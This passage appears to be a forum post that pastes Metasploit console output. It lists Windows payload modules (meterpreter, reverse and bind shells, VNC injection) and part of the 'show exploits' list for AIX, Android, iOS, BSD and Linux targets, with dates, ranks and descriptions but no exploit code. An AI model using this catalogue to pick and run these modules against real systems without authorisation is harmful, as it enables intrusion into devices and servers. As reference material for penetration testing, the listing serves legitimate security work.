   windows/upexec/reverse_ord_tcp                                       normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                           normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                                  normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                       normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/upexec/reverse_tcp_rc4                                       normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/upexec/reverse_tcp_rc4_dns                                   normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   windows/upexec/reverse_tcp_uuid                                      normal  Windows Upload/Execute, Reverse TCP Stager with UUID Support
   windows/vncinject/bind_hidden_ipknock_tcp                            normal  VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   windows/vncinject/bind_hidden_tcp                                    normal  VNC Server (Reflective Injection), Hidden Bind TCP Stager
   windows/vncinject/bind_ipv6_tcp                                      normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   windows/vncinject/bind_ipv6_tcp_uuid                                 normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/vncinject/bind_nonx_tcp                                      normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                           normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   windows/vncinject/bind_tcp_rc4                                       normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/vncinject/bind_tcp_uuid                                      normal  VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   windows/vncinject/find_tag                                           normal  VNC Server (Reflective Injection), Find Tag Ordinal Stager
   windows/vncinject/reverse_hop_http                                   normal  VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   windows/vncinject/reverse_http                                       normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   windows/vncinject/reverse_http_proxy_pstore                          normal  VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
   windows/vncinject/reverse_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                    normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                        normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                               normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   windows/vncinject/reverse_tcp_rc4                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/vncinject/reverse_tcp_rc4_dns                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   windows/vncinject/reverse_tcp_uuid                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
   windows/vncinject/reverse_winhttp                                    normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
   windows/x64/exec                                                     normal  Windows x64 Execute Command
   windows/x64/loadlibrary                                              normal  Windows x64 LoadLibrary Path
   windows/x64/meterpreter/bind_ipv6_tcp                                normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   windows/x64/meterpreter/bind_ipv6_tcp_uuid                           normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   windows/x64/meterpreter/bind_tcp                                     normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   windows/x64/meterpreter/bind_tcp_uuid                                normal  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   windows/x64/meterpreter/reverse_http                                 normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   windows/x64/meterpreter/reverse_https                                normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   windows/x64/meterpreter/reverse_named_pipe                           normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   windows/x64/meterpreter/reverse_tcp                                  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   windows/x64/meterpreter/reverse_tcp_uuid                             normal  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   windows/x64/meterpreter/reverse_winhttp                              normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   windows/x64/meterpreter/reverse_winhttps                             normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   windows/x64/meterpreter_bind_tcp                                     normal  Windows Meterpreter Shell, Bind TCP Inline (x64)
   windows/x64/meterpreter_reverse_http                                 normal  Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   windows/x64/meterpreter_reverse_https                                normal  Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   windows/x64/meterpreter_reverse_ipv6_tcp                             normal  Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   windows/x64/meterpreter_reverse_tcp                                  normal  Windows Meterpreter Shell, Reverse TCP Inline x64
   windows/x64/powershell_bind_tcp                                      normal  Windows Interactive Powershell Session, Bind TCP
   windows/x64/powershell_reverse_tcp                                   normal  Windows Interactive Powershell Session, Reverse TCP
   windows/x64/shell/bind_ipv6_tcp                                      normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   windows/x64/shell/bind_ipv6_tcp_uuid                                 normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   windows/x64/shell/bind_tcp                                           normal  Windows x64 Command Shell, Windows x64 Bind TCP Stager
   windows/x64/shell/bind_tcp_uuid                                      normal  Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   windows/x64/shell/reverse_tcp                                        normal  Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   windows/x64/shell/reverse_tcp_uuid                                   normal  Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   windows/x64/shell_bind_tcp                                           normal  Windows x64 Command Shell, Bind TCP Inline
   windows/x64/shell_reverse_tcp                                        normal  Windows x64 Command Shell, Reverse TCP Inline
   windows/x64/vncinject/bind_ipv6_tcp                                  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   windows/x64/vncinject/bind_ipv6_tcp_uuid                             normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   windows/x64/vncinject/bind_tcp                                       normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   windows/x64/vncinject/bind_tcp_uuid                                  normal  Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   windows/x64/vncinject/reverse_http                                   normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   windows/x64/vncinject/reverse_https                                  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   windows/x64/vncinject/reverse_tcp                                    normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   windows/x64/vncinject/reverse_tcp_uuid                               normal  Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   windows/x64/vncinject/reverse_winhttp                                normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   windows/x64/vncinject/reverse_winhttps                               normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

Código: [Seleccionar]
show exploits
Código: [Seleccionar]
msf > show exploits

Exploits
========

   Name                                                              Disclosure Date  Rank       Description
   ----                                                              ---------------  ----       -----------
   aix/local/ibstat_path                                             2013-09-24       excellent  ibstat $PATH Privilege Escalation
   aix/rpc_cmsd_opcode21                                             2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath                                      2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   android/adb/adb_server_exec                                       2016-01-01       excellent  Android ADB Debug Server Remote Payload Execution
   android/browser/samsung_knox_smdm_url                             2014-11-12       excellent  Samsung Galaxy KNOX Android Browser RCE
   android/browser/stagefright_mp4_tx3g_64bit                        2015-08-13       normal     Android Stagefright MP4 tx3g Integer Overflow
   android/browser/webview_addjavascriptinterface                    2012-12-21       excellent  Android Browser and WebView addJavascriptInterface Code Execution
   android/fileformat/adobe_reader_pdf_js_interface                  2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   android/local/futex_requeue                                       2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
   android/local/put_user_vroot                                      2013-09-06       excellent  Android get_user/put_user Exploit
   apple_ios/browser/safari_libtiff                                  2006-08-01       good       Apple iOS MobileSafari LibTIFF Buffer Overflow
   apple_ios/email/mobilemail_libtiff                                2006-08-01       good       Apple iOS MobileMail LibTIFF Buffer Overflow
   apple_ios/ssh/cydia_default_ssh                                   2007-07-02       excellent  Apple iOS Default SSH Password Vulnerability
   bsdi/softcart/mercantec_softcart                                  2004-08-19       great      Mercantec SoftCart CGI Overflow
   dialup/multi/login/manyargs                                       2001-12-12       good       System V Derived /bin/login Extraneous Arguments Buffer Overflow
   firefox/local/exec_shellcode                                      2014-03-10       excellent  Firefox Exec Shellcode from Privileged Javascript Shell
   freebsd/ftp/proftp_telnet_iac                                     2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   freebsd/http/watchguard_cmd_exec                                  2015-06-29       excellent  Watchguard XCS Remote Command Execution
   freebsd/local/mmap                                                2013-06-18       great      FreeBSD 9 Address Space Manipulation Privilege Escalation
   freebsd/local/watchguard_fix_corrupt_mail                         2015-06-29       manual     Watchguard XCS FixCorruptMail Local Privilege Escalation
   freebsd/misc/citrix_netscaler_soap_bof                            2014-09-22       normal     Citrix NetScaler SOAP Handler Remote Code Execution
   freebsd/samba/trans2open                                          2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   freebsd/tacacs/xtacacsd_report                                    2008-01-08       average    XTACACSD report() Buffer Overflow
   freebsd/telnet/telnet_encrypt_keyid                               2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer Overflow
   hpux/lpd/cleanup_exec                                             2002-08-28       excellent  HP-UX LPD Command Execution
   irix/lpd/tagprinter_exec                                          2001-09-01       excellent  Irix LPD tagprinter Command Execution
   linux/antivirus/escan_password_exec                               2014-04-04       excellent  eScan Web Management Console Command Injection
   linux/browser/adobe_flashplayer_aslaunch                          2008-12-17       good       Adobe Flash Player ActionScript Launch Command Execution Vulnerability
   linux/ftp/proftp_sreplace                                         2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   linux/ftp/proftp_telnet_iac                                       2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   linux/games/ut2004_secure                                         2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Linux)
   linux/http/accellion_fta_getstatus_oauth                          2015-07-10       excellent  Accellion FTA getStatus verify_oauth_token Command Execution
   linux/http/advantech_switch_bash_env_exec                         2015-12-01       excellent  Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   linux/http/airties_login_cgi_bof                                  2015-03-31       normal     Airties login-cgi Buffer Overflow
   linux/http/alcatel_omnipcx_mastercgi_exec                         2007-09-09       manual     Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
   linux/http/alienvault_exec                                        2017-01-31       excellent  AlienVault OSSIM/USM Remote Code Execution
   linux/http/alienvault_sqli_exec                                   2014-04-24       excellent  AlienVault OSSIM SQL Injection and Remote Code Execution
   linux/http/apache_continuum_cmd_exec                              2016-04-06       excellent  Apache Continuum Arbitrary Command Execution
   linux/http/astium_sqli_upload                                     2013-09-17       manual     Astium Remote Code Execution
   linux/http/atutor_filemanager_traversal                           2016-03-01       excellent  ATutor 2.2.1 Directory Traversal / Remote Code Execution
   linux/http/belkin_login_bof                                       2014-05-09       normal     Belkin Play N750 login.cgi Buffer Overflow
   linux/http/centreon_sqli_exec                                     2014-10-15       excellent  Centreon SQL and Command Injection
   linux/http/centreon_useralias_exec                                2016-02-26       excellent  Centreon Web Useralias Command Execution
   linux/http/cfme_manageiq_evm_upload_exec                          2013-09-04       excellent  Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal
   linux/http/cisco_firepower_useradd                                2016-10-10       excellent  Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability
   linux/http/crypttech_cryptolog_login_exec                         2017-05-03       excellent  Crypttech CryptoLog Remote Code Execution
   linux/http/dcos_marathon                                          2017-03-03       excellent  DC/OS Marathon UI Docker Exploit
   linux/http/ddwrt_cgibin_exec                                      2009-07-20       excellent  DD-WRT HTTP Daemon Arbitrary Command Execution
   linux/http/denyall_waf_exec                                       2017-09-19       excellent  DenyAll Web Application Firewall Remote Code Execution
   linux/http/dlink_authentication_cgi_bof                           2013-02-08       normal     D-Link authentication.cgi Buffer Overflow
   linux/http/dlink_command_php_exec_noauth                          2013-02-04       excellent  D-Link Devices Unauthenticated Remote Command Execution
   linux/http/dlink_dcs931l_upload                                   2015-02-23       great      D-Link DCS-931L File Upload
   linux/http/dlink_dcs_930l_authenticated_remote_command_execution  2015-12-20       excellent  D-Link DCS-930L Authenticated Remote Command Execution
   linux/http/dlink_diagnostic_exec_noauth                           2013-03-05       excellent  D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
   linux/http/dlink_dir300_exec_telnet                               2013-04-22       excellent  D-Link Devices Unauthenticated Remote Command Execution
   linux/http/dlink_dir605l_captcha_bof                              2012-10-08       manual     D-Link DIR-605L Captcha Handling Buffer Overflow
   linux/http/dlink_dir615_up_exec                                   2013-02-07       excellent  D-Link DIR615h OS Command Injection
   linux/http/dlink_dir850l_unauth_exec                              2017-08-09       excellent  DIR-850L (Un)authenticated OS Command Exec
   linux/http/dlink_dspw110_cookie_noauth_exec                       2015-06-12       normal     D-Link Cookie Command Execution
   linux/http/dlink_dspw215_info_cgi_bof                             2014-05-22       normal     D-Link info.cgi POST Request Buffer Overflow
   linux/http/dlink_hedwig_cgi_bof                                   2013-02-08       normal     D-Link hedwig.cgi Buffer Overflow in Cookie Header
   linux/http/dlink_hnap_bof                                         2014-05-15       normal     D-Link HNAP Request Remote Buffer Overflow
   linux/http/dlink_hnap_header_exec_noauth                          2015-02-13       normal     D-Link Devices HNAP SOAPAction-Header Command Execution
   linux/http/dlink_hnap_login_bof                                   2016-11-07       excellent  Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow
   linux/http/dlink_upnp_exec_noauth                                 2013-07-05       normal     D-Link Devices UPnP SOAP Command Execution
   linux/http/dnalims_admin_exec                                     2017-03-08       excellent  dnaLIMS Admin Module Command Execution
   linux/http/docker_daemon_tcp                                      2017-07-25       excellent  Docker Daemon - Unprotected TCP Socket Exploit
   linux/http/dolibarr_cmd_exec                                      2012-04-06       excellent  Dolibarr ERP/CRM Post-Auth OS Command Injection
   linux/http/dreambox_openpli_shell                                 2013-02-08       great      OpenPLI Webif Arbitrary Command Execution
   linux/http/efw_chpasswd_exec                                      2015-06-28       excellent  Endian Firewall Proxy Password Change Command Injection
   linux/http/empire_skywalker                                       2016-10-15       excellent  PowerShellEmpire Arbitrary File Upload (Skywalker)
   linux/http/esva_exec                                              2012-08-16       excellent  E-Mail Security Virtual Appliance learn-msg.cgi Command Injection
   linux/http/f5_icall_cmd                                           2015-09-03       excellent  F5 iControl iCall::Script Root Command Execution
   linux/http/f5_icontrol_exec                                       2013-09-17       excellent  F5 iControl Remote Root Command Execution
   linux/http/foreman_openstack_satellite_code_exec                  2013-06-06       excellent  Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection
   linux/http/fritzbox_echo_exec                                     2014-02-11       excellent  Fritz!Box Webcm Unauthenticated Command Injection
   linux/http/github_enterprise_secret                               2017-03-15       excellent  Github Enterprise Default Session Secret And Deserialization Vulnerability
   linux/http/gitlist_exec                                           2014-06-30       excellent  Gitlist Unauthenticated Remote Command Execution
   linux/http/goautodial_3_rce_command_injection                     2015-04-21       excellent  GoAutoDial 3.3 Authentication Bypass / Command Injection
   linux/http/gpsd_format_string                                     2005-05-25       average    Berlios GPSD Format String Vulnerability
   linux/http/groundwork_monarch_cmd_exec                            2013-03-08       excellent  GroundWork monarch_scan.cgi OS Command Injection
   linux/http/hp_system_management                                   2012-09-01       normal     HP System Management Anonymous Access Code Execution
   linux/http/huawei_hg532n_cmdinject                                2017-04-15       excellent  Huawei HG532n Command Injection
   linux/http/ipfire_bashbug_exec                                    2014-09-29       excellent  IPFire Bash Environment Variable Injection (Shellshock)
   linux/http/ipfire_oinkcode_exec                                   2017-06-09       excellent  IPFire proxy.cgi RCE
   linux/http/ipfire_proxy_exec                                      2016-05-04       excellent  IPFire proxy.cgi RCE
   linux/http/kaltura_unserialize_rce                                2016-03-15       excellent  Kaltura Remote PHP Code Execution
   linux/http/kloxo_sqli                                             2014-01-28       manual     Kloxo SQL Injection and Remote Code Execution
   linux/http/lifesize_uvc_ping_rce                                  2014-03-21       excellent  LifeSize UVC Authenticated RCE via Ping
   linux/http/linksys_apply_cgi                                      2005-09-13       great      Linksys WRT54 Access Point apply.cgi Buffer Overflow
   linux/http/linksys_e1500_apply_exec                               2013-02-05       excellent  Linksys E1500/E2500 apply.cgi Remote Command Injection
   linux/http/linksys_themoon_exec                                   2014-02-13       excellent  Linksys E-Series TheMoon Remote Command Injection
   linux/http/linksys_wrt110_cmd_exec                                2013-07-12       excellent  Linksys Devices pingstr Remote Command Injection
   linux/http/linksys_wrt160nv2_apply_exec                           2013-02-11       excellent  Linksys WRT160nv2 apply.cgi Remote Command Injection
   linux/http/linksys_wrt54gl_apply_exec                             2013-01-18       manual     Linksys WRT54GL apply.cgi Command Execution
   linux/http/logsign_exec                                           2017-02-26       excellent  Logsign Remote Command Injection
   linux/http/multi_ncc_ping_exec                                    2015-02-26       normal     D-Link/TRENDnet NCC Service Command Injection
   linux/http/mutiny_frontend_upload                                 2013-05-15       excellent  Mutiny 5 Arbitrary File Upload
   linux/http/mvpower_dvr_shell_exec                                 2015-08-23       excellent  MVPower DVR Shell Unauthenticated Command Execution
   linux/http/nagios_xi_chained_rce                                  2016-03-06       excellent  Nagios XI Chained Remote Code Execution
   linux/http/netgear_dgn1000_setup_unauth_exec                      2013-06-05       excellent  Netgear DGN1000 Setup.cgi Unauthenticated RCE
   linux/http/netgear_dgn1000b_setup_exec                            2013-02-06       excellent  Netgear DGN1000B setup.cgi Remote Command Execution
   linux/http/netgear_dgn2200b_pppoe_exec                            2013-02-15       manual     Netgear DGN2200B pppoe.cgi Remote Command Execution
   linux/http/netgear_dnslookup_cmd_exec                             2017-02-25       excellent  Netgear DGN2200 dnslookup.cgi Command Injection
   linux/http/netgear_r7000_cgibin_exec                              2016-12-06       excellent  Netgear R7000 and R6400 cgi-bin Command Injection
   linux/http/netgear_readynas_exec                                  2013-07-12       manual     NETGEAR ReadyNAS Perl Code Evaluation
   linux/http/netgear_wnr2000_rce                                    2016-12-20       excellent  NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow
   linux/http/nginx_chunked_size                                     2013-05-07       great      Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow
   linux/http/nuuo_nvrmini_auth_rce                                  2016-08-04       excellent  NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution
   linux/http/nuuo_nvrmini_unauth_rce                                2016-08-04       excellent  NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution
   linux/http/op5_config_exec                                        2016-04-08       excellent  op5 v7.1.9 Configuration Command Execution
   linux/http/openfiler_networkcard_exec                             2012-09-04       excellent  Openfiler v2.x NetworkCard Command Execution
   linux/http/pandora_fms_exec                                       2014-01-29       excellent  Pandora FMS Remote Code Execution
   linux/http/pandora_fms_sqli                                       2014-02-01       excellent  Pandora FMS Default Credential / SQLi Remote Code Execution
   linux/http/peercast_url                                           2006-03-08       average    PeerCast URL Handling Buffer Overflow
   linux/http/pineapp_ldapsyncnow_exec                               2013-07-26       excellent  PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution
   linux/http/pineapp_livelog_exec                                   2013-07-26       excellent  PineApp Mail-SeCure livelog.html Arbitrary Command Execution
   linux/http/pineapp_test_li_conn_exec                              2013-07-26       excellent  PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution
   linux/http/pineapple_bypass_cmdinject                             2015-08-01       excellent  Hak5 WiFi Pineapple Preconfiguration Command Injection
   linux/http/pineapple_preconfig_cmdinject                          2015-08-01       excellent  Hak5 WiFi Pineapple Preconfiguration Command Injection
   linux/http/piranha_passwd_exec                                    2000-04-04       excellent  RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
   linux/http/raidsonic_nas_ib5220_exec_noauth                       2013-02-04       manual     Raidsonic NAS Devices Unauthenticated Remote Command Execution
   linux/http/railo_cfml_rfi                                         2014-08-26       excellent  Railo Remote File Include
   linux/http/rancher_server                                         2017-07-27       excellent  Rancher Server - Docker Exploit
   linux/http/realtek_miniigd_upnp_exec_noauth                       2015-04-24       normal     Realtek SDK Miniigd UPnP SOAP Command Execution
   linux/http/riverbed_netprofiler_netexpress_exec                   2016-06-27       excellent  Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution
   linux/http/seagate_nas_php_exec_noauth                            2015-03-01       normal     Seagate Business NAS Unauthenticated Remote Command Execution
   linux/http/smt_ipmi_close_window_bof                              2013-11-06       good       Supermicro Onboard IPMI close_window.cgi Buffer Overflow
   linux/http/sophos_wpa_iface_exec                                  2014-04-08       excellent  Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution
   linux/http/sophos_wpa_sblistpack_exec                             2013-09-06       excellent  Sophos Web Protection Appliance sblistpack Arbitrary Command Execution
   linux/http/supervisor_xmlrpc_exec                                 2017-07-19       excellent  Supervisor XML-RPC Authenticated Remote Code Execution
   linux/http/symantec_messaging_gateway_exec                        2017-04-26       excellent  Symantec Messaging Gateway Remote Code Execution
   linux/http/symantec_web_gateway_exec                              2012-05-17       excellent  Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
   linux/http/symantec_web_gateway_file_upload                       2012-05-17       excellent  Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability
   linux/http/symantec_web_gateway_lfi                               2012-05-17       excellent  Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability
   linux/http/symantec_web_gateway_pbcontrol                         2012-07-23       excellent  Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection
   linux/http/symantec_web_gateway_restore                           2014-12-16       excellent  Symantec Web Gateway 5 restore.php Post Authentication Command Injection
   linux/http/synology_dsm_sliceupload_exec_noauth                   2013-10-31       excellent  Synology DiskStation Manager SLICEUPLOAD Remote Command Execution
   linux/http/tiki_calendar_exec                                     2016-06-06       excellent  Tiki-Wiki CMS Calendar Command Execution
   linux/http/tp_link_sc2020n_authenticated_telnet_injection         2015-12-20       excellent  TP-Link SC2020n Authenticated Telnet Injection
   linux/http/tr064_ntpserver_cmdinject                              2016-11-07       normal     Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064
   linux/http/trend_micro_imsva_exec                                 2017-01-15       excellent  Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution
   linux/http/trendmicro_imsva_widget_exec                           2017-10-07       excellent  Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution
   linux/http/trendmicro_sps_exec                                    2016-08-08       excellent  Trend Micro Smart Protection Server Exec Remote Code Injection
   linux/http/trueonline_billion_5200w_rce                           2016-12-26       excellent  TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection
   linux/http/trueonline_p660hn_v1_rce                               2016-12-26       excellent  TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection
   linux/http/trueonline_p660hn_v2_rce                               2016-12-26       excellent  TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection
   linux/http/ueb9_api_storage                                       2017-08-08       excellent  Unitrends UEB 9 http api/storage remote root
   linux/http/vap2500_tools_command_exec                             2014-11-25       normal     Arris VAP2500 tools_command.php Command Execution
   linux/http/vcms_upload                                            2011-11-27       excellent  V-CMS PHP File Upload and Execute
   linux/http/wanem_exec                                             2012-08-12       excellent  WAN Emulator v2.3 Command Execution
   linux/http/webcalendar_settings_exec                              2012-04-23       excellent  WebCalendar 1.2.4 Pre-Auth Remote Code Injection
   linux/http/webid_converter                                        2011-07-05       excellent  WeBid converter.php Remote PHP Code Injection
   linux/http/wipg1000_cmd_injection                                 2017-04-20       excellent  WePresent WiPG-1000 Command Injection
   linux/http/zabbix_sqli                                            2013-09-23       excellent  Zabbix 2.0.8 SQL Injection and Remote Code Execution
   linux/http/zen_load_balancer_exec                                 2012-09-14       excellent  ZEN Load Balancer Filelog Command Execution
   linux/http/zenoss_showdaemonxmlconfig_exec                        2012-07-30       good       Zenoss 3 showDaemonXMLConfig Command Execution
   linux/ids/alienvault_centerd_soap_exec                            2014-05-05       excellent  AlienVault OSSIM av-centerd Command Injection
   linux/ids/snortbopre                                              2005-10-18       good       Snort Back Orifice Pre-Preprocessor Buffer Overflow
   linux/imap/imap_uw_lsub                                           2000-04-16       good       UoW IMAP Server LSUB Buffer Overflow
   linux/local/bpf_priv_esc                                          2016-05-04       good       Linux BPF Local Privilege Escalation
   linux/local/cron_persistence                                      1979-07-01       excellent  Cron Persistence
   linux/local/desktop_privilege_escalation                          2014-08-07       excellent  Desktop Linux Password Stealer and Privilege Escalation
   linux/local/docker_daemon_privilege_escalation                    2016-06-28       excellent  Docker Daemon Privilege Escalation
   linux/local/hp_smhstart                                           2013-03-30       normal     HP System Management Homepage Local Privilege Escalation
   linux/local/kloxo_lxsuexec                                        2012-09-18       excellent  Kloxo Local Privilege Escalation
   linux/local/netfilter_priv_esc_ipv4                               2016-06-03       good       Linux Kernel 4.6.3 Netfilter Privilege Escalation
   linux/local/ntfs3g_priv_esc                                       2017-01-05       good       Debian/Ubuntu ntfs-3g Local Privilege Escalation
   linux/local/overlayfs_priv_esc                                    2015-06-16       good       Overlayfs Privilege Escalation
   linux/local/pkexec                                                2011-04-01       great      Linux PolicyKit Race Condition Privilege Escalation
   linux/local/recvmmsg_priv_esc                                     2014-02-02       good       Linux Kernel 3.13.1 Recvmmsg Privilege Escalation
   linux/local/service_persistence                                   1983-01-01       excellent  Service Persistence
   linux/local/sock_sendpage                                         2009-08-13       great      Linux Kernel Sendpage Local Privilege Escalation
   linux/local/sophos_wpa_clear_keys                                 2013-09-06       excellent  Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation
   linux/local/udev_netlink                                          2009-04-16       great      Linux udev Netlink Local Privilege Escalation
   linux/local/vmware_mount                                          2013-08-22       excellent  VMWare Setuid vmware-mount Unsafe popen(3)
   linux/local/zpanel_zsudo                                          2013-06-07       excellent  ZPanel zsudo Local Privilege Escalation Exploit
   linux/misc/accellion_fta_mpipe2                                   2011-02-07       excellent  Accellion FTA MPIPE2 Command Execution
   linux/misc/drb_remote_codeexec                                    2011-03-23       excellent  Distributed Ruby Remote Code Execution
   linux/misc/gld_postfix                                            2005-04-12       good       GLD (Greylisting Daemon) Postfix Buffer Overflow
   linux/misc/hikvision_rtsp_bof                                     2014-11-19       normal     Hikvision DVR RTSP Request Remote Code Execution
   linux/misc/hp_data_protector_cmd_exec                             2011-02-07       excellent  HP Data Protector 6 EXEC_CMD Remote Code Execution
   linux/misc/hp_nnmi_pmd_bof                                        2014-09-09       normal     HP Network Node Manager I PMD Buffer Overflow
   linux/misc/hp_vsa_login_bof                                       2013-06-28       normal     HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow
   linux/misc/hplip_hpssd_exec                                       2007-10-04       excellent  HPLIP hpssd.py From Address Arbitrary Command Execution
   linux/misc/ib_inet_connect                                        2007-10-03       good       Borland InterBase INET_connect() Buffer Overflow
   linux/misc/ib_jrd8_create_database                                2007-10-03       good       Borland InterBase jrd8_create_database() Buffer Overflow
   linux/misc/ib_open_marker_file                                    2007-10-03       good       Borland InterBase open_marker_file() Buffer Overflow
   linux/misc/ib_pwd_db_aliased                                      2007-10-03       good       Borland InterBase PWD_db_aliased() Buffer Overflow
   linux/misc/jenkins_java_deserialize                               2015-11-18       excellent  Jenkins CLI RMI Java Deserialization Vulnerability
   linux/misc/lprng_format_string                                    2000-09-25       normal     LPRng use_syslog Remote Format String Vulnerability
   linux/misc/mongod_native_helper                                   2013-03-24       normal     MongoDB nativeHelper.apply Remote Code Execution
   linux/misc/nagios_nrpe_arguments                                  2013-02-21       excellent  Nagios Remote Plugin Executor Arbitrary Command Execution
   linux/misc/netcore_udp_53413_backdoor                             2014-08-25       normal     Netcore Router Udp 53413 Backdoor
   linux/misc/netsupport_manager_agent                               2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   linux/misc/novell_edirectory_ncp_bof                              2012-12-12       normal     Novell eDirectory 8 Buffer Overflow
